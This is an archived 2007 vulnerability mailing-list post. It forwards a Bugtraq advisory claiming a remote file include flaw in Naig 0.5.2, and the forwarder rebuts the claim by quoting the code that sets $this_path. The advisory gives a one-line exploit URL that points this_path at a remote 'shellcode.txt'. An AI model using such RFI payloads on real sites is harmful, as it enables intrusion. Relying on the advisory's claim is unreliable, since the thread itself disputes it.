[VIM] Fwd: Naig <= 0.5.2 (this_path) Remote File Include Vulnerability
str0ke
str0ke at milw0rm.com
Fri Jan 12 16:59:35 EST 2007
Naig doesn't seem vulnerable since $this_path is set with the line below.
$this_path = substr($_SERVER["SCRIPT_FILENAME"],0,max(strrpos($_SERVER["SCRIPT_FILENAME"],"/"),strrpos($_SERVER["SCRIPT_FILENAME"],"\\"))+1);
/str0ke
---------- Forwarded message ----------
From: me you <r.5.7 at hotmail.com>
Date: Jan 12, 2007 3:50 PM
Subject: Naig <= 0.5.2 (this_path) Remote File Include Vulnerability
To: bugtraq at securityfocus.com
Cc: submit at milw0rm.com
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Naig <= 0.5.2 (this_path) Remote File Include Vulnerability
Script : Naig
Version : 0.5.2
URL : http://mesh.dl.sourceforge.net/sourceforge/naig/naig-0.5.2.zip
Found By : -= BorN To K!LL =-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
code in : index.php
require($this_path."config.inc.php");
require($this_path."Naig-includes/naig.inc.php");
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Exlo!t :.
^^^^
www.site.com/[path]/index.php?this_path=shellcode.txt?
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
GreeTz to : Dr.2 , Asbmay , ToOoFa , Q8^RoCK , SHiKaA .... All My
friends ..
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
More information about the VIM
mailing list